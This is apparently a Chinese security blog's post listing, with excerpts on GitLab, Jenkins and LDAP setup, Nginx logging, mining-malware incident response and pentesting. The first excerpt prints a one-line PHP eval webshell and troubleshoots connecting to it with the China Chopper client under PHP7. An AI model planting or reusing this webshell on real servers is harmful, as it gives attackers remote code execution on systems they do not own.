- 博客(16)
- 收藏
- 关注
RSS订阅原创 菜刀连接PHP WebShell返回200错误
错误详情WebShell内容:<?php @eval($_POST['cmd']);?>错误详情:在Hackber或BurpSuite中却没有问题:原因分析PHP7版本过高,在PHP7中,动态调用一些函数是被禁止的,比如在array_map中调用assert会提示:Warning: Cannot call func_num_args() dynamically in %s on line %d如果把一句话Shell中的@符号去掉,会提示:Cannot call as
2020-06-17 16:38:27
6697
7
原创 Gitlab安装与配置LDAP登录
Gitlab安装Centos7安装Gitlab# 解决依赖yum install policycoreutils-python.x86_64 openssh-server.x86_64 -y# 安装邮件服务yum install postfix.x86_64 -y# 添加GitLab Packagecurl https://packages.gitlab.com/install/repositories/gitlab/gitlab-ce/script.rpm.sh | bash# 安装
2020-06-17 15:40:06
8951
1
原创 Jenkins持续集成系统搭建
Jenkins安装Centos7安装JenkinsJenkins RPM包下载地址:https://pkg.jenkins.io/redhat-stable/# 安装java依赖yum install java-11-openjdk.x86_64 java-11-openjdk-devel.x86_64 -y# 导入私钥rpm --import https://pkg.jenkins.io/redhat-stable/jenkins.io.key# 下载Jenkins安装包wget ht
2020-06-17 15:23:01
311
原创 Centos7搭建原生LDAP服务
Centos7安装OpenLDAP# 安装OpenLDAPyum install -y openldap.x86_64 openldap-clients.x86_64 openldap-servers.x86_64 openldap-devel.x86_64 migrationtools.noarch compat-openldap.x86_64LDAP Server配置vim /etc/openldap/slapd.d/cn=config/olcDatabase={2}hdb.ldif# 修
2020-06-17 14:00:15
1958
原创 iTerm2免密登录
创建一个登录脚本#!/usr/bin/expectset timeout 10spawn ssh [lindex $argv 0]@[lindex $argv 1]expect { "(yes/no)?" {send "yes\n";exp_continue} "password:" {send "[lindex $argv 2]\n"}}interact给脚本赋予执行权限chmod +x *.sh在iTerm2中配置...
2020-06-16 11:49:58
307
原创 日志分析系列(三):分析实战篇
本系列故事纯属虚构,如有雷同实属巧合在之前的系列中,小B完成了日志分析平台的实现,也接入了各种日志源,做好了这些前期工作,接下来就是真正利用平台实现分析并体现日志价值的时候了。日志的价值体现在什么地方?在安全日志分析的大场景中,我们都是根据不同场景下的特征来进行分析,我们以主机安全场景特征判断为例:通过对这些场景的思路整理,我们可以发现识别攻击场景的方式大致包括:关键字匹配、统计分析、聚...
2020-03-15 21:08:10
353
原创 完成一次渗透测试项目
背景:小B接到一个渗透测试任务,由于很久没有从乙方视角执行渗透测试的他决定先梳理一下自己的思路。准备工作第一个是渗透测试用例:对于技术人员来讲这是一个比较好的知识点沉淀的方式,不但有助于你在每一次的渗透测试中不遗漏掉某个点,并且还可以在团队内部进行共享方便提升团队内部成员的技能。第二个是工具箱:工欲善其事必先利其器,有一个好的工具箱决定我们在渗透测试时的效率。一个好的工具箱应该包括,不同操作...
2020-03-04 19:31:19
1672
原创 挖矿应急响应小结
背景:总结一下遇到挖矿时应该如何做应急响应与溯源分析。1. 挖矿特征分析当服务器或PC处于什么样的状态时,我们可以判定为被挖矿。通常来说,当我们的服务器或PC资源(CPU)使用率接近或超过100%,并持续高居不下导致服务器或PC操作延缓,我们就可以判定被挖矿。常见挖矿其它特征如下:服务器或PC访问[过]不受信任的地址,这些地址包括:主机、IP、域名。这是由于大部分挖矿都需要从一个不受信任的...
2020-03-04 19:30:01
1168
原创 日志分析系列(外传三):平台安全性
本系列故事纯属虚构,如有雷同实属巧合小B在实现了统一日志分析平台后,想到的第一个问题就是平台的安全性,用于安全分析的平台被攻击成功,那么小B将颜面扫地还可能被扫地出门。所以小B认证分析了平台可能存在的安全风险:平台产品自身的安全漏洞(解决方案:及时安装补丁或升级版本);数据泄露:在采集存储使用等过程中造成的数据泄露问题(解决方案:加密);未授权访问:平台无任何访问控制措施导致未授权访问(...
2020-03-04 19:27:53
975
原创 日志分析系列之平台实现
本系列故事纯属虚构,如有雷同实属巧合平台实现前的说明小B在给老板汇报了"统一日志分析平台"项目后,老板拍板立即开始做,争取下一次能及时发现攻击并且追踪攻击者。于是小B开始分析了市面上商业与开源的日志分析平台架构,大家都神似如下图:知道了架构如何,接下来的关键就是每层之间选择什么样的产品了。关于如何选择,小B推荐了几个方面:已有架构:避免基础能力的重复,使用目前IT基础框架中已有的东西。...
2020-03-04 19:26:22
1289
原创 Nginx日志统一化
本系列故事纯属虚构,如有雷同实属巧合为了完成对Nginx服务器的日志分析,小B对Q公司的Nginx日志做了统一化要求。下面是小B在统一化过程中遇到的一些知识点:Nginx日志与字段解析Q公司的Nginx版本信息是:1.17.6,使用编译安装,安装过程如下:yum install zlib-devel.x86_64 zlib.x86_64 openssl.x86_64 openssl-dev...
2020-03-04 19:24:15
455
原创 日志分析系列之介绍篇
本系列故事纯属虚构,如有雷同实属巧合小B是Q公司的安全攻城狮,最近Q公司不太平,出现了好几次的安全攻击事件。可在事后小B却找不到被攻击的真正原因,于是领导下命令给小B,必须做到对攻击事件的检测与溯源,不然就可以卷铺盖回家了。听到此话的小B冷汗连连,找到最近几次攻击的记录文档,认真剖析未发现真相的原因,总结如下:系统未记录日志:部分系统无日志信息可用。日志信息无备份:日志被攻击者删除,或因...
2020-03-04 19:21:52
394
原创 Nginx透过代理获取真实客户端IP
本系列中的故事纯属虚构,如有雷同实属巧合小B是’柒’公司的安全攻城狮,为了完成任务小B开始做起了调研(欲知背景如何,且听下回分说)。首先小B弄明白了’柒’公司的应用系统架构是:Client --> CDN --> SLB --> Server。发现在应用服务器上Nginx日志中采集的关于定位用户身份信息的IP维度数据不准确。不准确的原因是:因为在应用服务器中Nginx使用X...
2020-03-04 19:20:02
1062
原创 攻防视角下的信息收集
信息收集是指通过各种方式获取所需的信息。信息收集是信息得以利用的第一步,也是关键的一步。—百度百科信息收集是指黑客为了更加有效地实施渗透攻击而在攻击前或攻击过程中对目标的所有探测活动。背景: 不论曾经作为白帽子、安全服务工程师还是现在作为甲方安全工程师,都明白信息收集这项工作的重要性。目前网络上关于信息收集的文章数不胜数,那么为什么还要老生常谈?主要是目前网络上的文章更多是站在白帽子或者攻...
2020-03-04 19:17:13
1481
原创 谈谈信息安全入门这事
本周一在发布"计算机与网络安全系列书单推荐"时,hblf的朋友圈给了我一定触动,"信息安全如何入门"这个问题让我想到了一些有趣的东西,所以抽空写一写自己的答案。"信息安全如何入门"这个问题我觉得需要拆成3个部分来回答:信息安全包括什么?什么算入门?你要如何学习?备注:本文中的信息安全没有特意区分cyber security、data security等。1.信息安全包括什么我个人觉得我是回...
2020-03-04 19:15:27
954
原创 计算机与网络安全系列书籍推荐
每个人都有自己喜欢阅读的书籍,我也不例外。偶然翻看3年前的微博,答应与朋友(@t0data)一起整理计算机与网络安全的优秀书籍。在之前也做了一个简单的书单共享:https://bloodzer0.github.io/ossa/study_notes/books/,但是由于GitHub Pages的局限性不能提供评论来让大家推荐自己认为的优秀书籍,所以迁移到微信公众号上,后期也会逐步将文章迁移过来。...
2020-03-04 19:12:40
2737
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人